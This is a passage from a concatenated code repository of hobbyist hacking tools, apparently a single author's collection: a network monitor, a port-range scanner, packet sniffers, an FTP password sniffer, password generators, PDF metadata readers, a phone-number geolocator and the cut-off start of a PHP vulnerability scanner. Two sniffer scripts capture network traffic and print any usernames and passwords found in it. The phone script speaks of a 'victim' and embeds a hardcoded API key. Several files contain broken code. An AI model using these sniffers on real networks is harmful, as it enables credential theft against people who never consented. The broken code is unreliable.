pass_doc, "file") 44 | print('\n') 45 | print("***************** Thank you **********************") 46 | -------------------------------------------------------------------------------- /network-monitoring.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import socket 4 | import datetime 5 | import time 6 | import psutil 7 | 8 | FILE = os.path.join(os.getcwd(), "networkinfo.log") 9 | 10 | # creating log file in the currenty directory 11 | # ??getcwd?? get current working directory, 12 | # os function, ??path?? to specify path 13 | 14 | try: 15 | def ping(): 16 | # to ping a particular IP 17 | try: 18 | socket.setdefaulttimeout(3) 19 | 20 | # if data interruption occurs for 3 21 | # seconds, part will be executed 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | # AF_INET: address family 25 | # SOCK_STREAM: type for TCP 26 | 27 | host = "8.8.8.8" 28 | port = 53 29 | 30 | server_address = (host, port) 31 | s.connect(server_address) 32 | 33 | except OSError as error: 34 | return False 35 | # function returns false value 36 | # after data interruption 37 | 38 | else: 39 | s.close() 40 | # closing the connection after the 41 | # communication with the server is completed 42 | return True 43 | 44 | 45 | def calculate_time(start, stop): 46 | 47 | # calculating unavailability 48 | # time and converting it in seconds 49 | difference = stop - start 50 | seconds = float(str(difference.total_seconds())) 51 | return str(datetime.timedelta(seconds=seconds)).split(".")[0] 52 | 53 | def first_check(): 54 | # to check if the system was already 55 | # connected to an internet connection 56 | 57 | if ping(): 58 | # if ping returns true 59 | live = "\n \033[92m✔️✔️✔️ CONNECTION ACQUIRED\n" 60 | print(live) 61 | connection_acquired_time = datetime.datetime.now() 62 | acquiring_message = " \033[92m✔️✔️✔️ Connection Acquired At: " + \ 63 | str(connection_acquired_time).split(".")[0] 64 | print(acquiring_message) 65 | 66 | with open(FILE, "a") as file: 67 | 68 | # writes into the log file 69 | file.write(live) 70 | file.write(acquiring_message) 71 | 72 | return True 73 | 74 | else: 75 | # if ping returns false 76 | not_live = "\n\033[91m ❌❌❌ CONNECTION NOT ACQUIRED\n" 77 | print(not_live) 78 | 79 | with open(FILE, "a") as file: 80 | 81 | # writes into the log file 82 | file.write(not_live) 83 | return False 84 | 85 | 86 | def main(): 87 | 88 | # main function to call functions 89 | monitor_start_time = datetime.datetime.now() 90 | monitoring_date_time = "\033[92m [+] Monitoring Started At: " + \ 91 | str(monitor_start_time).split(".")[0] 92 | if first_check(): 93 | # if true 94 | print(monitoring_date_time) 95 | # monitoring will only start when 96 | # the connection will be acquired 97 | 98 | else: 99 | # if false 100 | while True: 101 | 102 | # infinite loop to see if the connection is acquired 103 | if not ping(): 104 | 105 | # if connection not acquired 106 | time.sleep(1) 107 | else: 108 | 109 | # if connection is acquired 110 | first_check() 111 | print(monitoring_date_time) 112 | break 113 | 114 | with open(FILE, "a") as file: 115 | 116 | # write into the file as a into networkinfo.log, 117 | # "a" - append: opens file for appending, 118 | # creates the file if it does not exist??? 119 | file.write("\n") 120 | file.write(monitoring_date_time + "\n") 121 | 122 | while True: 123 | 124 | # infinite loop, as we are monitoring 125 | # the network connection till the machine runs 126 | if ping(): 127 | 128 | # if true: the loop will execute after every 5 seconds 129 | time.sleep(5) 130 | 131 | else: 132 | # if false: fail message will be displayed 133 | down_time = datetime.datetime.now() 134 | fail_msg = "\033[91m ❌❌❌ Disconnected At: " + str(down_time).split(".")[0] 135 | print(fail_msg) 136 | 137 | with open(FILE, "a") as file: 138 | # writes into the log file 139 | file.write(fail_msg + "\n") 140 | 141 | while not ping(): 142 | 143 | # infinite loop, will run till ping() return true 144 | time.sleep(1) 145 | 146 | up_time = datetime.datetime.now() 147 | 148 | # after loop breaks, connection restored 149 | uptime_message = "\033[92m connected again: " + str(up_time).split(".")[0] 150 | 151 | down_time = calculate_time(down_time, up_time) 152 | unavailablity_time = " \033[92mconnection was unavailable for: " + down_time 153 | 154 | print(uptime_message) 155 | print(unavailablity_time) 156 | 157 | with open(FILE, "a") as file: 158 | 159 | # log entry for connection restoration time, 160 | # and unavailability time 161 | file.write(uptime_message + "\n") 162 | file.write(unavailablity_time + "\n") 163 | def slowprint(s): 164 | for c in s + '\n' : 165 | sys.stdout.write(c) 166 | sys.stdout.flush() 167 | time.sleep(10. / 100) 168 | slowprint(" \n\033[93m Press Ctrl+C To Do Network Monitoring") 169 | slowprint(" \n\033[91m Double Press Ctrl+C To Exit Tool") 170 | main() 171 | 172 | except KeyboardInterrupt: 173 | slowprint("\n\033[90m [*] You Have Entered Ctrl+C....Entering Into Network Monitor Mode.... ") 174 | 175 | UPDATE_DELAY = 1 # in seconds 176 | try: 177 | def get_size(bytes): 178 | """ 179 | Returns size of bytes in a nice format 180 | """ 181 | for unit in ['', 'K', 'M', 'G', 'T', 'P']: 182 | if bytes < 1024: 183 | return f"{bytes:.2f}{unit}B" 184 | bytes /= 1024 185 | 186 | # get the network I/O stats from psutil 187 | io = psutil.net_io_counters() 188 | # extract the total bytes sent and received 189 | bytes_sent, bytes_recv = io.bytes_sent, io.bytes_recv 190 | def slowprint(s): 191 | for c in s + '\n' : 192 | sys.stdout.write(c) 193 | sys.stdout.flush() 194 | time.sleep(10. / 100) 195 | slowprint("\n \033[92m [+] Network Monitoring Is On Progress : ") 196 | time.sleep(2) 197 | while True: 198 | # sleep for `UPDATE_DELAY` seconds 199 | time.sleep(UPDATE_DELAY) 200 | # get the stats again 201 | io_2 = psutil.net_io_counters() 202 | # new - old stats gets us the speed 203 | us, ds = io_2.bytes_sent - bytes_sent, io_2.bytes_recv - bytes_recv 204 | # print the total download/upload along with current speeds 205 | print(f"Upload: {get_size(io_2.bytes_sent)} " 206 | f", Download: {get_size(io_2.bytes_recv)} " 207 | f", Upload Speed: {get_size(us / UPDATE_DELAY)}/s " 208 | f", Download Speed: {get_size(ds / UPDATE_DELAY)}/s ", end="\r") 209 | # update the bytes_sent and bytes_recv for next iteration 210 | bytes_sent, bytes_recv = io_2.bytes_sent, io_2.bytes_recv 211 | except KeyboardInterrupt: 212 | slowprint("\n\n\033[91m [-] Ctrl+C Detected.....Exiting.....") 213 | time.sleep(2) 214 | -------------------------------------------------------------------------------- /network-scanner.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from requests import get 3 | #Check If Port Is Open 4 | def isOpen(ip, port): 5 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | s.settimeout(2) 7 | try: 8 | s.connect((ip, int(port))) 9 | s.shutdown(socket.SHUT_RDWR) 10 | file=open("rzlt.txt", "a+") 11 | file.write(ip) 12 | file.write("\n +++++++++++++++++++++++++++++ Code from R3DHULK +++++++++++++++++++++++++++++\n") 13 | #return True 14 | print(ip[0],"Is up") 15 | except: 16 | #return False 17 | print("Is Down") 18 | finally: 19 | s.close() 20 | ##Range Ip Function ipRange 21 | def ipRange(start_ip, end_ip): 22 | start = list(map(int, start_ip.split("."))) 23 | end = list(map(int, end_ip.split("."))) 24 | temp = start 25 | ip_range = [] 26 | 27 | ip_range.append(start_ip) 28 | while temp != end: 29 | start[3] += 1 30 | for i in (3, 2, 1): 31 | if temp[i] == 256: 32 | temp[i] = 0 33 | temp[i-1] += 1 34 | ip_range.append(".".join(map(str, temp))) 35 | 36 | return ip_range 37 | pass 38 | 39 | #logo 40 | print (''' 41 | ********************************************************************** 42 | * _ _ _ _ ___ * 43 | * | \| |___| |___ __ _____ _ _| |__ / __| __ __ _ _ _ _ _ ___ _ _ * 44 | * | .` / -_) _\ V V / _ \ '_| / / \__ \/ _/ _` | ' \| ' \/ -_) '_| * 45 | * |_|\_\___|\__|\_/\_/\___/_| |_\_\ |___/\__\__,_|_||_|_||_\___|_| * 46 | * * 47 | * code from R3dHULK * 48 | * github page : https://github.com/R3DHULK * 49 | * * 50 | ********************************************************************** 51 | ''') 52 | 53 | # main start 54 | From = input("Put Start From Range ➡️ " ) 55 | To = input("Put End Of Range ➡️ " ) 56 | ip_range = ipRange(From, To) 57 | port = input("Put Port To Check in If It is Up ➡️ ") 58 | print("Stating 😊 😊 😊 :> From",From,"To",To) 59 | Exteral_IP = get('https://api.ipify.org').text #get External Ip 60 | print("HULK says your external ip is 👉 ",Exteral_IP) 61 | ok = input("Press Enter To Start ") 62 | print (" ") 63 | print ("*** Hulk came up with *** ") 64 | print (" ") 65 | for ip in ip_range: 66 | print("Check For ",ip) 67 | isOpen(ip,port) 68 | input("Enter To Exit") -------------------------------------------------------------------------------- /packet-sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import scapy.all as scapy 3 | import argparse 4 | from scapy.layers import http 5 | print("\033[93m usage : packet-sniffer -i ") 6 | def get_interface(): 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("-i", "--interface", dest="interface", help="Specify interface on which to sniff packets") 9 | arguments = parser.parse_args() 10 | return arguments.interface 11 | 12 | def sniff(iface): 13 | scapy.sniff(iface=iface, store=False, prn=process_packet) 14 | 15 | def process_packet(packet): 16 | if packet.haslayer(http.HTTPRequest): 17 | print("[+] Http Request >> " + packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path) 18 | if packet.haslayer(scapy.Raw): 19 | load = packet[scapy.Raw].load 20 | keys = ["username", "password", "pass", "email"] 21 | for key in keys: 22 | if key in load: 23 | print("\n\n\n[+] Possible password/username >> " + load + "\n\n\n") 24 | break 25 | 26 | iface = get_interface() 27 | sniff(iface) 28 | -------------------------------------------------------------------------------- /packet-sniffer2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import textwrap 4 | import binascii 5 | import struct 6 | import sys,time 7 | 8 | TAB_1 = '\t - ' 9 | TAB_2 = '\t\t - ' 10 | TAB_3 = '\t\t\t - ' 11 | TAB_4 = '\t\t\t\t - ' 12 | 13 | DATA_TAB_1 = '\t ' 14 | DATA_TAB_2 = '\t\t ' 15 | DATA_TAB_3 = '\t\t\t ' 16 | DATA_TAB_4 = '\t\t\t\t ' 17 | print(" usage : python packet-sniffer2.py ") 18 | try: 19 | def main(): 20 | conn = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) 21 | 22 | filters = (["ICMP", 1, "ICMPv6"],["UDP", 17, "UDP"], ["TCP", 6, "TCP"]) 23 | filter = [] 24 | 25 | if len(sys.argv) == 2: 26 | print("This is the filter: ", sys.argv[1]) 27 | for f in filters: 28 | if sys .argv[1] == f[0]: 29 | filter = f 30 | 31 | 32 | 33 | while True: 34 | raw_data, addr = conn.recvfrom(65536) 35 | dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) 36 | 37 | if eth_proto == 'IPV6': 38 | newPacket, nextProto = ipv6Header(data, filter) 39 | printPacketsV6(filter, nextProto, newPacket) 40 | 41 | elif eth_proto == 'IPV4': 42 | printPacketsV4(filter, data, raw_data) 43 | 44 | 45 | 46 | def printPacketsV4(filter, data, raw_data): 47 | (version, header_length, ttl, proto, src, target, data) = ipv4_Packet(data) 48 | 49 | # ICMP 50 | if proto == 1 and (len(filter) == 0 or filter[1] == 1): 51 | icmp_type, code, checksum, data = icmp_packet(data) 52 | print ("*******************ICMP***********************") 53 | print ("\tICMP type: %s" % (icmp_type)) 54 | print ("\tICMP code: %s" % (code)) 55 | print ("\tICMP checksum: %s" % (checksum)) 56 | 57 | # TCP 58 | elif proto == 6 and (len(filter) == 0 or filter[1] == 6): 59 | print("*******************TCPv4***********************") 60 | print('Version: {}\nHeader Length: {}\nTTL: {}'.format(version, header_length, ttl)) 61 | print('protocol: {}\nSource: {}\nTarget: {}'.format(proto, src, target)) 62 | src_port, dest_port, sequence, acknowledgment, flag_urg, flag_ack, flag_psh, flag_rst, flag_syn, flag_fin = struct.unpack( 63 | '! H H L L H H H H H H', raw_data[:24]) 64 | print('*****TCP Segment*****') 65 | print('Source Port: {}\nDestination Port: {}'.format(src_port, dest_port)) 66 | print('Sequence: {}\nAcknowledgment: {}'.format(sequence, acknowledgment)) 67 | print('*****Flags*****') 68 | print('URG: {}\nACK: {}\nPSH: {}'.format(flag_urg, flag_ack, flag_psh)) 69 | print('RST: {}\nSYN: {}\nFIN:{}'.format(flag_rst, flag_syn, flag_fin)) 70 | 71 | if len(data) > 0: 72 | # HTTP 73 | if src_port == 80 or dest_port == 80: 74 | print('*****HTTP Data*****') 75 | try: 76 | http = HTTP(data) 77 | http_info = str(http.data).split('\n') 78 | for line in http_info: 79 | print(str(line)) 80 | except: 81 | print(format_output_line("",data)) 82 | else: 83 | print('*****TCP Data*****') 84 | print(format_output_line("",data)) 85 | # UDP 86 | elif proto == 17 and (len(filter) == 0 or filter[1] == 17): 87 | print("*******************UDPv4***********************") 88 | print('Version: {}\nHeader Length: {}\nTTL: {}'.format(version, header_length, ttl)) 89 | print('protocol: {}\nSource: {}\nTarget: {}'.format(proto, src, target)) 90 | src_port, dest_port, length, data = udp_seg(data) 91 | print('*****UDP Segment*****') 92 | print('Source Port: {}\nDestination Port: {}\nLength: {}'.format(src_port, dest_port, length)) 93 | 94 | 95 | def printPacketsV6(filter, nextProto, newPacket): 96 | remainingPacket = "" 97 | 98 | if (nextProto == 'ICMPv6' and (len(filter) == 0 or filter[2] == "ICMPv6")): 99 | remainingPacket = icmpv6Header(newPacket) 100 | elif (nextProto == 'TCP' and (len(filter) == 0 or filter[2] == "TCP")): 101 | remainingPacket = tcpHeader(newPacket) 102 | elif (nextProto == 'UDP' and (len(filter) == 0 or filter[2] == "UDP")): 103 | remainingPacket = udpHeader(newPacket) 104 | 105 | return remainingPacket 106 | 107 | 108 | def tcpHeader(newPacket): 109 | # 2 unsigned short,2unsigned Int,4 unsigned short. 2byt+2byt+4byt+4byt+2byt+2byt+2byt+2byt==20byts 110 | packet = struct.unpack("!2H2I4H", newPacket[0:20]) 111 | srcPort = packet[0] 112 | dstPort = packet[1] 113 | sqncNum = packet[2] 114 | acknNum = packet[3] 115 | dataOffset = packet[4] >> 12 116 | reserved = (packet[4] >> 6) & 0x003F 117 | tcpFlags = packet[4] & 0x003F 118 | urgFlag = tcpFlags & 0x0020 119 | ackFlag = tcpFlags & 0x0010 120 | pushFlag = tcpFlags & 0x0008 121 | resetFlag = tcpFlags & 0x0004 122 | synFlag = tcpFlags & 0x0002 123 | finFlag = tcpFlags & 0x0001 124 | window = packet[5] 125 | checkSum = packet[6] 126 | urgPntr = packet[7] 127 | 128 | print ("*******************TCP***********************") 129 | print ("\tSource Port: "+str(srcPort) ) 130 | print ("\tDestination Port: "+str(dstPort) ) 131 | print ("\tSequence Number: "+str(sqncNum) ) 132 | print ("\tAck. Number: "+str(acknNum) ) 133 | print ("\tData Offset: "+str(dataOffset) ) 134 | print ("\tReserved: "+str(reserved) ) 135 | print ("\tTCP Flags: "+str(tcpFlags) ) 136 | 137 | if(urgFlag == 32): 138 | print ("\tUrgent Flag: Set") 139 | if(ackFlag == 16): 140 | print ("\tAck Flag: Set") 141 | if(pushFlag == 8): 142 | print ("\tPush Flag: Set") 143 | if(resetFlag == 4): 144 | print ("\tReset Flag: Set") 145 | if(synFlag == 2): 146 | print ("\tSyn Flag: Set") 147 | if(finFlag == True): 148 | print ("\tFin Flag: Set") 149 | 150 | print ("\tWindow: "+str(window)) 151 | print ("\tChecksum: "+str(checkSum)) 152 | print ("\tUrgent Pointer: "+str(urgPntr)) 153 | print (" ") 154 | 155 | packet = packet[20:] 156 | return packet 157 | 158 | 159 | def udpHeader(newPacket): 160 | packet = struct.unpack("!4H", newPacket[0:8]) 161 | srcPort = packet[0] 162 | dstPort = packet[1] 163 | lenght = packet[2] 164 | checkSum = packet[3] 165 | 166 | print ("*******************UDP***********************") 167 | print ("\tSource Port: "+str(srcPort)) 168 | print ("\tDestination Port: "+str(dstPort)) 169 | print ("\tLenght: "+str(lenght)) 170 | print ("\tChecksum: "+str(checkSum)) 171 | print (" ") 172 | 173 | packet = packet[8:] 174 | return packet 175 | 176 | 177 | def icmpv6Header(data): 178 | ipv6_icmp_type, ipv6_icmp_code, ipv6_icmp_chekcsum = struct.unpack( 179 | ">BBH", data[:4]) 180 | 181 | print ("*******************ICMPv6***********************") 182 | print ("\tICMPv6 type: %s" % (ipv6_icmp_type)) 183 | print ("\tICMPv6 code: %s" % (ipv6_icmp_code)) 184 | print ("\tICMPv6 checksum: %s" % (ipv6_icmp_chekcsum)) 185 | 186 | data = data[4:] 187 | return data 188 | 189 | 190 | def nextHeader(ipv6_next_header): 191 | if (ipv6_next_header == 6): 192 | ipv6_next_header = 'TCP' 193 | elif (ipv6_next_header == 17): 194 | ipv6_next_header = 'UDP' 195 | elif (ipv6_next_header == 43): 196 | ipv6_next_header = 'Routing' 197 | elif (ipv6_next_header == 1): 198 | ipv6_next_header = 'ICMP' 199 | elif (ipv6_next_header == 58): 200 | ipv6_next_header = 'ICMPv6' 201 | elif (ipv6_next_header == 44): 202 | ipv6_next_header = 'Fragment' 203 | elif (ipv6_next_header == 0): 204 | ipv6_next_header = 'HOPOPT' 205 | elif (ipv6_next_header == 60): 206 | ipv6_next_header = 'Destination' 207 | elif (ipv6_next_header == 51): 208 | ipv6_next_header = 'Authentication' 209 | elif (ipv6_next_header == 50): 210 | ipv6_next_header = 'Encapsuling' 211 | 212 | return ipv6_next_header 213 | 214 | 215 | def ipv6Header(data, filter): 216 | ipv6_first_word, ipv6_payload_legth, ipv6_next_header, ipv6_hoplimit = struct.unpack( 217 | ">IHBB", data[0:8]) 218 | ipv6_src_ip = socket.inet_ntop(socket.AF_INET6, data[8:24]) 219 | ipv6_dst_ip = socket.inet_ntop(socket.AF_INET6, data[24:40]) 220 | 221 | bin(ipv6_first_word) 222 | "{0:b}".format(ipv6_first_word) 223 | version = ipv6_first_word >> 28 224 | traffic_class = ipv6_first_word >> 16 225 | traffic_class = int(traffic_class) & 4095 226 | flow_label = int(ipv6_first_word) & 65535 227 | 228 | ipv6_next_header = nextHeader(ipv6_next_header) 229 | data = data[40:] 230 | 231 | return data, ipv6_next_header 232 | 233 | 234 | # Unpack Ethernet Frame 235 | def ethernet_frame(data): 236 | proto = "" 237 | IpHeader = struct.unpack("!6s6sH",data[0:14]) 238 | dstMac = binascii.hexlify(IpHeader[0]) 239 | srcMac = binascii.hexlify(IpHeader[1]) 240 | protoType = IpHeader[2] 241 | nextProto = hex(protoType) 242 | 243 | if (nextProto == '0x800'): 244 | proto = 'IPV4' 245 | elif (nextProto == '0x86dd'): 246 | proto = 'IPV6' 247 | 248 | data = data[14:] 249 | 250 | return dstMac, srcMac, proto, data 251 | 252 | # Format MAC Address 253 | def get_mac_addr(bytes_addr): 254 | bytes_str = map('{:02x}'.format, bytes_addr) 255 | mac_addr = ':'.join(bytes_str).upper() 256 | return mac_addr 257 | 258 | # Unpack IPv4 Packets Recieved 259 | def ipv4_Packet(data): 260 | version_header_len = data[0] 261 | version = version_header_len >> 4 262 | header_len = (version_header_len & 15) * 4 263 | ttl, proto, src, target = struct.unpack('! 8x B B 2x 4s 4s', data[:20]) 264 | return version, header_len, ttl, proto, ipv4(src), ipv4(target), data[header_len:] 265 | 266 | # Returns Formatted IP Address 267 | def ipv4(addr): 268 | return '.'.join(map(str, addr)) 269 | 270 | 271 | # Unpacks for any ICMP Packet 272 | def icmp_packet(data): 273 | icmp_type, code, checksum = struct.unpack('! B B H', data[:4]) 274 | return icmp_type, code, checksum, data[4:] 275 | 276 | # Unpacks for any TCP Packet 277 | def tcp_seg(data): 278 | (src_port, dest_port, sequence, acknowledgement, offset_reserved_flag) = struct.unpack('! H H L L H', data[:14]) 279 | offset = (offset_reserved_flag >> 12) * 4 280 | flag_urg = (offset_reserved_flag & 32) >> 5 281 | flag_ack = (offset_reserved_flag & 32) >> 4 282 | flag_psh = (offset_reserved_flag & 32) >> 3 283 | flag_rst = (offset_reserved_flag & 32) >> 2 284 | flag_syn = (offset_reserved_flag & 32) >> 1 285 | flag_fin = (offset_reserved_flag & 32) >> 1 286 | 287 | return src_port, dest_port, sequence, acknowledgement, flag_urg, flag_ack, flag_psh, flag_rst, flag_syn, flag_fin, data[offset:] 288 | 289 | 290 | # Unpacks for any UDP Packet 291 | def udp_seg(data): 292 | src_port, dest_port, size = struct.unpack('! H H 2x H', data[:8]) 293 | return src_port, dest_port, size, data[8:] 294 | 295 | # Formats the output line 296 | def format_output_line(prefix, string): 297 | size=80 298 | size -= len(prefix) 299 | if isinstance(string, bytes): 300 | string = ''.join(r'\x{:02x}'.format(byte) for byte in string) 301 | if size % 2: 302 | size-= 1 303 | return '\n'.join([prefix + line for line in textwrap.wrap(string, size)]) 304 | 305 | 306 | main() 307 | except KeyboardInterrupt: 308 | print("\n\033[91m [-] Exiting...") 309 | time.sleep(4) 310 | -------------------------------------------------------------------------------- /pass-gen-gui.py: -------------------------------------------------------------------------------- 1 | #importing Libraries 2 | 3 | from tkinter import * 4 | import random, string 5 | import pyperclip 6 | 7 | #initialize window 8 | root =Tk() 9 | root.geometry("400x400") 10 | root.resizable(0,0) 11 | root.title("Hulk - PASSWORD GENERATOR") 12 | 13 | #heading 14 | heading = Label(root, text = 'PASSWORD GENERATOR' , font ='arial 15 bold').pack() 15 | Label(root, text ='STAY SAFE! STAY PROTECTED !', font ='arial 15 bold').pack(side = BOTTOM) 16 | 17 | #select password length 18 | pass_label = Label(root, text = 'PASSWORD LENGTH', font = 'arial 10 bold').pack() 19 | pass_len = IntVar() 20 | length = Spinbox(root, from_ = 8, to_ = 32 , textvariable = pass_len , width = 15).pack() 21 | 22 | #define function 23 | pass_str = StringVar() 24 | 25 | def Generator(): 26 | password = '' 27 | for x in range (0,4): 28 | password = random.choice(string.ascii_uppercase)+random.choice(string.ascii_lowercase)+random.choice(string.digits)+random.choice(string.punctuation) 29 | for y in range(pass_len.get()- 4): 30 | password = password+random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + string.punctuation) 31 | pass_str.set(password) 32 | 33 | #button 34 | Button(root, text = "GENERATE PASSWORD" , command = Generator ).pack(pady= 5) 35 | Entry(root , textvariable = pass_str).pack() 36 | 37 | #function to copy 38 | def Copy_password(): 39 | pyperclip.copy(pass_str.get()) 40 | Button(root, text = 'COPY TO CLIPBOARD', command = Copy_password).pack(pady=5) 41 | 42 | # loop to run program 43 | root.mainloop() 44 | -------------------------------------------------------------------------------- /password_generator.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | 4 | print(''' 5 | ******************************************************** 6 | * [?] Simple Random Password Generator Tool [?] * 7 | * * 8 | * You Can Save Them In My Advanced Notepad Software * 9 | * Check Out : https://github.com/R3DHULK/hulk-office * 10 | * * 11 | ******************************************************** 12 | ''') 13 | def get_string(letters_count, digits_count): 14 | letters = ''.join((random.choice(string.ascii_letters) for i in range(letters_count))) 15 | digits = ''.join((random.choice(string.digits) for i in range(digits_count))) 16 | 17 | # Convert resultant string to list and shuffle it to mix letters and digits 18 | sample_list = list(letters + digits) 19 | random.shuffle(sample_list) 20 | # convert list to string 21 | final_string = ''.join(sample_list) 22 | print('Random string with', letters_count, 'letters', 'and', digits_count, 'digits', 'is:', final_string) 23 | print("Enter how many Letters and Numbers you wish to combine below 👇") 24 | get_string(int(input("How many letters? : ")), int(input("How to many number? : "))) 25 | input("Enter To Close") -------------------------------------------------------------------------------- /passwordsniffer.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from logging import exception, getLogger, ERROR 3 | getLogger('scapy.runtime').setlevel(ERROR) 4 | try: 5 | from scapy.all import * 6 | except ImportError: 7 | print'[!] Error: Scapy Installation Not Found' 8 | sys.exit(1) 9 | 10 | interface = sys.argv[1] 11 | 12 | username = ['Error: Unlucky Timing'] 13 | passwords = ['Error: Unlucky Timing'] 14 | 15 | def check_login(pkt, username, password): 16 | try: 17 | if '230' in pkt[Raw].load: 18 | print'[*] Valid Credentials Found... ' 19 | print'\t[*] ' + str(pkt[IP].dst).strip() + ' -> ' + str(pkt[IP].src).strip() + ':' 20 | print '\t [*] Username: ' + username 21 | print '\t [*] Password: ' + password + '\n' 22 | return 23 | else: 24 | return 25 | except Exception: 26 | return 27 | 28 | def check_for_ftp(pkt): 29 | if pkt.haslayer(TCP) and pkt.haslayer(Raw): 30 | if pkt[TCP].dport == 21 or pkt[TCP].sport == 21: 31 | return True 32 | else: 33 | return False 34 | def check_pkt(pkt): 35 | if check_for_ftp(pkt): 36 | pass 37 | else: 38 | return 39 | data = pkt[Raw].load 40 | if 'USER' in data: 41 | username.append(data.split('USER')[1].strip()) 42 | elif 'PASS' in data: 43 | passwords.append(data.split('PASS')[1].strip()) 44 | else: 45 | check_login(pkt, username[-1], passwords[-1]) 46 | return 47 | print '[*] Sniffing Started on %s ... \n' % interface 48 | try: 49 | sniff(iface=interface, prn=check_pkt, store=0) 50 | exception Exception: 51 | print '[!] Error: Failed to Initialize Sniffing' 52 | sys.exit(1) 53 | print '\n[*] Sniffing Stopped' 54 | -------------------------------------------------------------------------------- /pdf-exif-tool.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | import sys 3 | import os 4 | # read the pdf file 5 | os.system("clear") 6 | print(''' 7 | ___ ___ ___ _____ _____ ___ _____ ___ ___ _ 8 | | _ \ \| __| | __\ \/ /_ _| __| |_ _/ _ \ / _ \| | v. 1. O 9 | | _/ |) | _| | _| > < | || _| | || (_) | (_) | |__ 10 | |_| |___/|_| |___/_/\_\___|_| |_| \___/ \___/|____| 11 | c 0 d e f 0 12 | r m R3DHULK ''') 13 | print("") 14 | pdf = pikepdf.Pdf.open(input("Enter PDF Name : ")) 15 | print("") 16 | docinfo = pdf.docinfo 17 | for key, value in docinfo.items(): 18 | print( key, ":", value) 19 | print("") 20 | input("Enter To Close Window") 21 | os.system("clear") 22 | -------------------------------------------------------------------------------- /pdf-exif-toolv2.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | import datetime 3 | import re 4 | from dateutil.tz import tzutc, tzoffset 5 | import sys 6 | import os 7 | 8 | 9 | pdf_date_pattern = re.compile(''.join([ 10 | r"(D:)?", 11 | r"(?P\d\d\d\d)", 12 | r"(?P\d\d)", 13 | r"(?P\d\d)", 14 | r"(?P\d\d)", 15 | r"(?P\d\d)", 16 | r"(?P\d\d)", 17 | r"(?P[+-zZ])?", 18 | r"(?P\d\d)?", 19 | r"'?(?P\d\d)?'?"])) 20 | 21 | 22 | def transform_date(date_str): 23 | """ 24 | Convert a pdf date such as "D:20120321183444+07'00'" into a usable datetime 25 | http://www.verypdf.com/pdfinfoeditor/pdf-date-format.htm 26 | (D:YYYYMMDDHHmmSSOHH'mm') 27 | :param date_str: pdf date string 28 | :return: datetime object 29 | """ 30 | global pdf_date_pattern 31 | match = re.match(pdf_date_pattern, date_str) 32 | if match: 33 | date_info = match.groupdict() 34 | 35 | for k, v in date_info.items(): # transform values 36 | if v is None: 37 | pass 38 | elif k == 'tz_offset': 39 | date_info[k] = v.lower() # so we can treat Z as z 40 | else: 41 | date_info[k] = int(v) 42 | 43 | if date_info['tz_offset'] in ('z', None): # UTC 44 | date_info['tzinfo'] = tzutc() 45 | else: 46 | multiplier = 1 if date_info['tz_offset'] == '+' else -1 47 | date_info['tzinfo'] = tzoffset(None, multiplier*(3600 * date_info['tz_hour'] + 60 * date_info['tz_minute'])) 48 | 49 | for k in ('tz_offset', 'tz_hour', 'tz_minute'): # no longer needed 50 | del date_info[k] 51 | 52 | return datetime.datetime(**date_info) 53 | 54 | 55 | 56 | # get the target pdf file from the command-line arguments 57 | # read the pdf file 58 | os.system("clear") 59 | print(''' 60 | ___ ___ ___ _____ _____ ___ _____ ___ ___ _ 61 | | _ \ \| __| | __\ \/ /_ _| __| |_ _/ _ \ / _ \| | v. 2. O 62 | | _/ |) | _| | _| > < | || _| | || (_) | (_) | |__ 63 | |_| |___/|_| |___/_/\_\___|_| |_| \___/ \___/|____| 64 | c 0 d e f 0 65 | r m R3DHULK 66 | 67 | https://github.com/R3DHULK 68 | ''') 69 | 70 | print("") 71 | try: 72 | pdf = pikepdf.Pdf.open(input(" [*] Enter PDF Name : ")) 73 | print("") 74 | docinfo = pdf.docinfo 75 | for key, value in docinfo.items(): 76 | if str(value).startswith("D:"): 77 | # pdf datetime format, convert to python datetime 78 | value = transform_date(str(pdf.docinfo["/CreationDate"])) 79 | print( key, ":", value) 80 | except KeyboardInterrupt: 81 | print("\n [-] Ctrl+C Detected......Exiting\n") 82 | print("") 83 | input("Enter To Close Window") 84 | -------------------------------------------------------------------------------- /phone-number-info.py: -------------------------------------------------------------------------------- 1 | import phonenumbers 2 | from test import number 3 | from phonenumbers import carrier 4 | from phonenumbers import geocoder 5 | import opencage 6 | from opencage.geocoder import OpenCageGeocode 7 | import folium 8 | # a = input("Enter Victim's Phone Number : ") 9 | pepnumber = phonenumbers.parse(number) 10 | # phone_number = phonenumbers.parse(a) 11 | location= geocoder.country_name_for_number(pepnumber,'en') 12 | print(location) 13 | serviceprovider=phonenumbers.parse(number) 14 | # print (geocoder.country_name_for_number(serviceprovider,'en')) 15 | # print(geocoder.description_for_number(serviceprovider,'en')) 16 | print(carrier.name_for_number(serviceprovider,'en')) 17 | 18 | key = '944709d076f94d72977655a555f0a479' 19 | 20 | geocoder = OpenCageGeocode(key) 21 | query = str(location) 22 | results = geocoder.geocode(query) 23 | # print(results) 24 | 25 | lat = results[0]['geometry']['lat'] 26 | lng = results[0]['geometry']['lng'] 27 | 28 | print(lat,lng) 29 | 30 | myMap = folium.Map(location=[lat,lng],zoom_start=9) 31 | folium.Marker([lat,lng],popup=location).add_to(myMap) 32 | 33 | myMap.save("mylocation.html") 34 | input(" Enter To Exit") 35 | -------------------------------------------------------------------------------- /phpvuln.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | print ('''\033[93m 4 | ********************************************** 5 | * Simple PHP Vulnerability Scanner * 6 | * github page : https://github.com/r3dhulk * 7 | ********************************************** 8 | ''') 9 | 10 | def scan_vulnerabilities(url): 11 | response = requests.get(url) 12 | if response.status_code == 200: 13 | if 